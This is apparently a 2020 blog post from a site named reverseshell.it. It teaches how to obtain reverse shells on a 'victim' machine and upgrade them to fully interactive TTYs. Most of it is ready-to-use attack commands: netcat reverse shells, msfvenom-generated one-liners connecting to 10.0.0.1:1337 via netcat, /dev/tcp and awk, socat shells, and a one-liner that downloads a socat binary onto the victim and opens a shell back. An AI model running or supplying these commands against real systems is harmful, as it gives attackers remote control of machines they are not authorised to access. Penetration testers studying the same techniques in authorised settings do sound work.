I ReverseShell and you?

EMAIL

info@reverseshell.it

PHONE

no phone sorry

LOCATION

We are
almost,
Everywhere

TWITTER FACEBOOK INSTAGRAM

Upgrade Simple Shells to a rocking Fully Interactive one

AUTHOR
DATE
27/05/2020

Do you know when you got your loved reverse shell but you don’t have all the bells and whistles of a full TTY shell? The time when you hit “Ctrl-C” and boom….you exit out and kills the connection? And not talking about su, ssh, vim and so on…

Then, it’s time to upgrade it!

Just to recap the basics for a reverse shell:

# on your box
nc -lvnp <your_port>

# on your victim you send
nc -e /bin/bash <your_ip> <your_port>

But what happen if the “-e” option isn’t available?

Well…..there’s a way but we will cover it in another post.

Option #1 - Python pty

Simple as typing but we miss Ctrl-C, autocompletition, history etc, but it’s a starting point to jump then to stty options

python -c 'import pty; pty.spawn("/bin/bash")'

But we have something more to do for a better user experience:

# on your victim
CTRL+Z

# now you are on your machine
$ stty raw -echo
$ fg

# now you are in your victim
$ reset
$ export SHELL=bash
$ export TERM=xterm
$ stty rows <num> columns <cols>

# --> ENJOY <-- #

How you can know ehich rows and columns to use?

Wel….just take them from your machine

$ stty -a
speed 38400 baud; rows 50; columns 198; line = 0;

Option #2 - Oneliner msfvenom

Metasploit has many payloads that can be used for a oneliner reverse shell:

msfvenom -l payloads | grep "cmd/unix" | awk '{print $1}'
cmd/unix/bind_awk
cmd/unix/bind_busybox_telnetd
cmd/unix/bind_inetd
cmd/unix/bind_jjs
cmd/unix/bind_lua
cmd/unix/bind_netcat
cmd/unix/bind_netcat_gaping
cmd/unix/bind_netcat_gaping_ipv6
cmd/unix/bind_nodejs
cmd/unix/bind_perl
cmd/unix/bind_perl_ipv6
cmd/unix/bind_r
cmd/unix/bind_ruby
cmd/unix/bind_ruby_ipv6
cmd/unix/bind_socat_udp
cmd/unix/bind_stub
cmd/unix/bind_zsh
cmd/unix/generic
cmd/unix/interact
cmd/unix/pingback_bind
cmd/unix/pingback_reverse
cmd/unix/reverse
cmd/unix/reverse_awk
cmd/unix/reverse_bash
cmd/unix/reverse_bash_telnet_ssl
cmd/unix/reverse_bash_udp
cmd/unix/reverse_jjs
cmd/unix/reverse_ksh
cmd/unix/reverse_lua
cmd/unix/reverse_ncat_ssl
cmd/unix/reverse_netcat
cmd/unix/reverse_netcat_gaping
cmd/unix/reverse_nodejs
cmd/unix/reverse_openssl
cmd/unix/reverse_perl
cmd/unix/reverse_perl_ssl
cmd/unix/reverse_php_ssl
cmd/unix/reverse_python
cmd/unix/reverse_python_ssl
cmd/unix/reverse_r
cmd/unix/reverse_ruby
cmd/unix/reverse_ruby_ssl
cmd/unix/reverse_socat_udp
cmd/unix/reverse_ssh
cmd/unix/reverse_ssl_double_telnet
cmd/unix/reverse_stub
cmd/unix/reverse_tclsh
cmd/unix/reverse_zsh

You can use any of those option to create your reverse shell. Let’s see some example:

--> msfvenom -p cmd/unix/reverse_netcat LHOST=10.0.0.1 LPORT=1337
mkfifo /tmp/ixvn; nc 10.0.0.1 1337 0</tmp/ixvn | /bin/sh >/tmp/ixvn 2>&1; rm /tmp/ixvn


--> msfvenom -p cmd/unix/reverse_bash LPORT=1337 LHOST=10.0.0.1 LPORT=1337
0<&113-;exec 113<>/dev/tcp/10.0.0.1/1337;sh <&113 >&113 2>&113

--> msfvenom -p cmd/unix/reverse_awk LPORT=1337 LHOST=10.0.0.1 LPORT=1337
awk 'BEGIN{s="/inet/tcp/0/10.0.0.1/1337";while(1){do{s|&getline c;if(c){while((c|&getline)>0)print $0|&s;close(c)}}while(c!="exit");close(s)}}'

Option #3 - Socat

If you are lucky enough to have socat installed on your victim machine:

# on your box start a listening
socat file:`tty`,raw,echo=0 tcp-listen:<your_port>

# on your vitcim
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<you_ip>:<your_port>

But if you don’t have it handy on the victim box, you are not in a close road and you can always inject a static binary and use it in the way you prefer.

https://github.com/andrew-d/static-binaries

Use it like this example:

wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:1337

NEXT STORY